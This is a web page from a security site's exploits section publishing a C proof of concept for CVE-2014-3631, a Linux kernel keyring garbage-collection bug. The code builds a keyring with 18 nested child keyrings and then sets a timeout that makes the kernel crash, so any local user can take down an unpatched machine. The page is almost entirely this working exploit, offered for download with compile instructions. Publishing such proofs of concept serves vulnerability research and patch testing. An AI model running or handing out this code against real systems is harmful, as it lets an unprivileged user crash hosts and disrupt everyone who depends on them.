You are here : Home » Exploits » cve-2014-3631 Linux Kernel D.O.S POC

cve-2014-3631 Linux Kernel D.O.S POC

D 23 February 2015     H 20:37     A Emeric Nasi     C 0 messages


agrandir
  1.  
  2.  
  3. /* ----------------------------------------------------------------------------------------------------
  4.  * cve-2014-3631_poc.c
  5.  *
  6.  * The assoc_array_gc function in the associative-array implementation in lib/assoc_array.c in the Linux kernel before 3.16.3
  7.  * does not properly implement garbage collection, which allows local users to cause a denial of service (NULL pointer dereference and system crash)
  8.  * or possibly have unspecified other impact via multiple "keyctl newring" operations followed by a "keyctl timeout" operation.
  9.  *
  10.  *
  11.  * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
  12.  *
  13.  * Compile with gcc -fno-stack-protector -Wall -o cve-2014-3631_poc cve-2014-3631_poc.c -lkeyutils
  14.  *
  15.  *
  16.  * Emeric Nasi - www.sevagas.com
  17.  *-----------------------------------------------------------------------------------------------------*/
  18.  
  19.  
  20. /* ----------------------- Includes ----------------------------*/
  21.  
  22. #define _GNU_SOURCE 1
  23. #include <stdint.h>
  24. #include <stdio.h>
  25. #include <stdlib.h>
  26. #include <string.h>
  27. #include <unistd.h>
  28. #include <sys/mman.h>
  29. #include <syscall.h>
  30. #include <stdint.h>
  31. #include <inttypes.h>
  32. #include <keyutils.h>
  33. #include <fcntl.h>
  34.  
  35.  
  36. #define TARGET_KERNEL_MIN "3.13.0"
  37. #define TARGET_KERNEL_MAX "3.16.2"
  38. #define EXPLOIT_NAME "cve-2014-3631"
  39. #define EXPLOIT_TYPE DOS
  40.  
  41.  
  42. /* ----------------------- functions ----------------------------*/
  43.  
  44.  
  45.  
  46. /**
  47.  * Poc for cve_2014_3631 vulnerability
  48.  */
  49. int main()
  50. {
  51. key_serial_t currentKey = 0;
  52. key_serial_t topKey = 0;
  53. int i = 0;
  54. int fp;
  55. char kname[16]={0};
  56. char gc_delay[16] = {0};
  57. int delay =0;
  58.  
  59. printf("[cve_2014_3631]: Preparing to exploit.\n");
  60.  
  61. // fetch garbage collector value..
  62. fp = open("/proc/sys/kernel/keys/gc_delay",O_RDONLY);
  63. if(fp == -1)
  64. {
  65. printf("[cve_2014_3631 error]: Could not open /proc/sys/kernel/keys/gc_delay, assuming delay is 5 minutes. \n");
  66. delay = 300;
  67. }
  68. else
  69. {
  70. read(fp,gc_delay,sizeof(gc_delay-1));
  71. delay = atoi(gc_delay);
  72. close(fp);
  73. }
  74.  
  75. // Add top key
  76. topKey = add_key("keyring","Lvl1K",NULL,0,KEY_SPEC_USER_KEYRING);
  77. if(topKey == -1)
  78. {
  79. printf("[cve_2014_3631 error]: keyring fault\n");
  80. perror("add_key");
  81. return -1;
  82. }
  83.  
  84. // Add 18 keys to top key
  85. for(i=0; i< 18; i++)
  86. {
  87. memset(kname,00,sizeof(kname));
  88. memcpy(kname,"Lvl2K_",strlen("Lvl2K_"));
  89. sprintf(kname+strlen("Lvl2K_"),"%d",i);
  90. currentKey = add_key("keyring",kname,NULL,0,topKey);
  91. if(currentKey == -1)
  92. {
  93. printf("[cve_2014_3631 error]: keyring fault\n");
  94. perror("add_key");
  95. return -1;
  96. }
  97. }
  98.  
  99. /* Entering exploit critical code */
  100. printf("[cve_2014_3631]: Exploit!\n");
  101.  
  102. // Set timeout and wait for garbage collector
  103. keyctl_set_timeout(currentKey, 2);
  104.  
  105. // Wait for garbage collector
  106. printf("[cve_2014_3631]: Exploit triggered, system will panic in %d seconds..\n",delay);
  107.  
  108. return 0;
  109. }
  110.  
  111.  
  112.  

Download

Also in this section

15 December 2016 – TVT DVR/CCTV webshell exploit

11 April 2015 – cve-2014-7822 Linux Kernel D.O.S POC

24 February 2015 – cve-2014-4943 Linux Kernel D.O.S POC

23 February 2015 – cve-2014-9322 Linux Kernel D.O.S POC

Any message or comments?
pre-moderation

This forum is moderated before publication: your contribution will only appear after being validated by an administrator.

Who are you?
Your post